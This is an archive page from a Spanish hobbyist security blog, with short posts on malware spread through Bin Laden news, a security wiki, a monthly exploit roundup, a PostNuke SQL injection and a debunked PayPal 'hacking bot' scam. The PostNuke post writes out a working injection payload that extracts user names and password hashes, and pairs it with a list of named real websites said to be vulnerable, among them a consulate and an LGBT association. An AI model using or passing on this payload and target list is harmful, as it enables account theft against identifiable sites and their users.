Archive for the ‘ Lamer ’ Category

Muerte de Osama Bin Laden utilizada para extender Malware

Debido al boom mediático que está teniendo la muerte del terrorista más buscado de todos los tiempos, son muchas las personas que tratan de aprovecharse de esto y extender enlaces maliciosos a través de redes sociales como twitter, facebook o tuenti, por lo que únicamente avisar y que andeis con ojo.

Vía | Kapersky

Nace intypedia project

intypedia project
Ha nacido intypedia project un wiki destinado a la seguridad informática donde más que texto se utilizarán videos para ejemplificar las cosas. Todas esas horas de no encontrar la opción que buscabais se han acabado. Espero que os sea de utilidad y sea un proyecto fructífero.
intypedia.com

Ha nacido intypedia project un wiki destinado a la seguridad informática donde más que texto se utilizarán videos para ejemplificar las cosas. Todas esas horas de no encontrar la opción que buscabais se han acabado. Espero que os sea de utilidad y sea un proyecto fructífero.
intypedia.com

Exploits del mes de abril

Bueno aquí os dejo un link a una serie de exploits que salieron a lo largo de abril, teneis desde desbordamiento de pila para bsplayer, hasta inyecciones sql… espero que os sea de utilidad.

Perdonad que no actualicemos más amenudo pero estamos teniendo problemas con el traslado de servidor… a ver si lo solucionamos pronto y retomamos el ritmo normal.

Un saludo

Ataque SQL Injection a PostNuke!

 Ha aparecido una vulnerabilidad de tipo SQL Injection en Postnuke.

 

Inyección de código:

 

index.php?module=PostSchedule&view=event&eid=-

 

 1′)+union+select+0,1,2,3,4,5,6,7,8,concat(pn_uname,char(58),pn_pass),10,11,12,13/**/

 

 from/**/nuke_users/**/where/**/pn_uid=2/*

 

 

El autor de dicho descubrimiento es Vuln search Kacper (kacper1964_at_yahoo.pl) de http://devilteam.pl

 

Algunas páginas encontradas por Freelogs.Net vulnerables al ataque son:

 

www.exactas.org

www.trabajosocial.unam.mx

www.amigosdelaire.com

www.dentistasrioja.com

www.adolince.net

www.sirzee.itcr.ac.cr

www.azimutclm.com

 

Entre las webs más interesantes destacar:

 

www.consuladouy-bcn.org ( Consulado de Uruguay en Barcelona)

www.lasalle.es ( Mi Ex colegio xD )

www.sinver.org ( Asociación universitaria de GAYS y LESBIANAS DE Barcelona)

www.sexosintabues.com ( Comunidad Erótica de España)

 

Freelogs.NET no ha perpetrado ningún ataque, son datos informativos, no nos hacemos responsables del  uso que se le pueda dar a esta información.

 

 

 

 

 

Hackeador con cuenta Paypal hackeada!

Corre por ahí el mismo cuento de siempre. “ Robar password de Hotmail”: Manda un correo a este mail, hay un bot que te enviará la password poniendo estas sentencias en estas determinadas líneas.

 

El cuento ya va más allá de Hotmail o yahoo. Ahora Paypal. Lo bonito es que la gente sigue picando. Esta vez se nos dice que tenemos que registrar una cuenta Paypal, confirmarla con nuestra tarjeta de crédito, y mandar el mail con 4 chorradas sin sentido, y nuestros datos de paypal, a la dirección Paypal_bot_32@yahoo.com entre otras muchas dependiendo donde contrastemos la información.

 

En este phishing trampa para lammers y newbies non comentaban lo siguiente:

 

En la línea de asunto:
789bot4 * 5% 8verif-0e24Cuerpo del mensaje:

 


En la línea 1: Asunto-Type:? Text / plain = “+1”?En la línea 2: charset = us-English

En la línea 3: botbody * 78 # 9 confirmation0e24.yahoo.com

En la línea 4: p38ylec00rm::% s% (a href = http://www.paypal.com%%)

En la línea 5: Su dirección de correo electrónico principal en paypal

En la línea 6: start (recuperar> 07)

En la línea 7: check # 8% (* valor = = float)

En la línea 8: La contraseña de PayPal

En la línea 9: # searchppagend72hrlog

En la línea 10 send #% * idR20334-tsa-0583

En la línea 11 (#% 7 * tmbot *= “+098”)

 

 

Algunas páginas en las que he leído semejante chorrada, que demuestra que el bloggero no testea la información publicada es:

 

http://buluxan.wordpress.com/2008/04/19/how-to-hack-paypal/

 

http://hackpaypal.wordpress.com/2008/01/15/how-to-hack-paypalcom/

 

http://free7.wordpress.com/2008/01/10/warning-paypal-hacking/